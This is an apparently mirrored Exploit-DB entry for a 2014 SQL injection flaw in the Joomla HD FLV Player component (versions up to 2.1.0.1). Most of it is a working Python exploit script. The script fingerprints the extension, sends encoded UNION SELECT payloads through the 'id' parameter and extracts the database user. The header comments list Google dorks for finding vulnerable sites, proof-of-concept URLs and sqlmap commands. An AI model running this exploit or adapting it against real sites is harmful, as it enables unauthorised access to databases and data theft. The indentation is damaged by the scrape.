Joomla! Component com_hdflvplayer < 2.1.0.1 - SQL Injection

  • 作者: Claudio Viviani
    日期: 2014-11-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35220/
  • #!/usr/bin/python
#
# Exploit Title :Joomla HD FLV 2.1.0.1 and below SQL Injection
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.hdflvplayer.net/
#
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
#
# Dork google 1:inurl:/component/hdflvplayer/
# Dork google 2:inurl:com_hdflvplayer
#
# Date : 2014-11-11
#
# Tested on : BackBox 3.x/4.x
#
# Info: The variable "id" is not sanitized (again)
# Over 80.000 downloads (statistic reported on official site)
#
#
# Video Demo: http://youtu.be/-EdOQSjAhW8
#
# Poc: 
#http://www.target.it/index.php?option=com_hdflvplayer&id=1[Sqli]
#http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6 [SQLi]/page/1 (url rewrite)
#
# Poc sqlmap:
#sqlmap -u "http://www.target.it/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql
#sqlmap -u "http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6*" --dbms mysql (url rewrite)
#
# http connection
import urllib, urllib2
# string manipulation
import re
# Errors management
import sys
# Args management
import optparse

# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url

banner = """
_________ ___ ___ ______
 | _ .-----.-----.--------|.---.-. | Y | _\ 
 |___| |_|_|||_| |.1 |.| \
 |.| |_____|_____|__|__|__|__|___._| |._ |.|\ 
 |:1 | |:| |:1/ 
 |::.. . | |::.|:. |::.. . /
 `-------' `--- ---`------' 
_______ ___ ___ ___ _______ __
 | _ | | | Y | | _ |.---.-.--.--.-----.----.
 |.1___|.| |.| | |.1 ||_|||-__| _|
 |.__) |.|___|.| | |.____|__|___._|___|_____|__|
 |:| |:1 |:1 | |:||_____| 
 |::.| |::.. . |\:.. ./|::.|
 `---' `-------' `---' `---' 
<= 2.1.0.1 Sql Injection

Written by:

Claudio Viviani

 http://www.homelab.it

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
 https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)

options, remainder = commandList.parse_args()

# Check args
if not options.target:
print(banner)
commandList.print_help()
sys.exit(1)

host = checkurl(options.target)

checkext = 0

evilurl = { '/index.php?option=com_hdflvplayer&id=-9404%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29' : '/index.php?option=com_hdflvplayer&id=[SQLi]' }

char = "%2CNULL"
endurl = "%2CNULL%23"
bar = "#"

print(banner)

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

sys.stdout.write("\r[+] Searching HD FLV Extension...: ")

try:
 req = urllib2.Request(host+'/index.php?option=com_hdflvplayer&task=languagexml', None, headers)
 response = urllib2.urlopen(req).readlines()

 for line_version in response:

if not line_version.find("<?xml version=\"1.0\" encoding=\"utf-8\"?>") == -1:
 checkext += 1
else:
 checkext += 0

 if checkext > 0: 
sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
 else:
sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
sys.exit(1)
 
except urllib2.HTTPError:
 sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
 sys.exit(1)

except urllib2.URLError as e:
 print("\n[X] Connection Error: "+str(e.code))
 sys.exit(1)

print("")

sys.stdout.write("\r[+] Checking Version: ")

try:
 req = urllib2.Request(host+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
 response = urllib2.urlopen(req).readlines()

 for line_version in response:

if not line_version.find("<version>") == -1:

 VER = re.compile('>(.*?)<').search(line_version).group(1)

 sys.stdout.write("\r[+] Checking Version: "+str(VER))

except urllib2.HTTPError:
 sys.stdout.write("\r[+] Checking Version: Unknown")

except urllib2.URLError as e:
 print("\n[X] Connection Error: "+str(e.code))
 sys.exit(1)

print("")

for exploiting, dork in evilurl.iteritems():

 s = ""
 barcount = ""
 for a in range(1,100):

s += char
try:
 req = urllib2.Request(host+exploiting+s+endurl, None, headers)
 response = urllib2.urlopen(req).read()

 if "h0m3l4b1t" in response:
print "\n[!] VULNERABLE"
current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)
print "[*] Username: "+str(current_user)
print ""
print "[*] 3v1l Url: "+host+exploiting+s+endurl
sys.exit(0)

except urllib2.HTTPError as e:
 response = e.read()
 if "h0m3l4b1t" in response:
print "\n[!] VULNERABLE"
current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)
print "[*] Username: "+str(current_user)
print ""
print "[*] 3v1l Url: "+host+exploiting+s+endurl
sys.exit(0)

except urllib2.URLError as e:
 print("\n[X] Connection Error: "+str(e.code))
 sys.exit(1)

barcount += bar
sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
sys.stdout.flush()

print "\n[X] Not vulnerable :("
print "[X] Try with tool like sqlmap and url "+host+"/index.php?option=com_hdflvplayer&id=1 (valid id number)"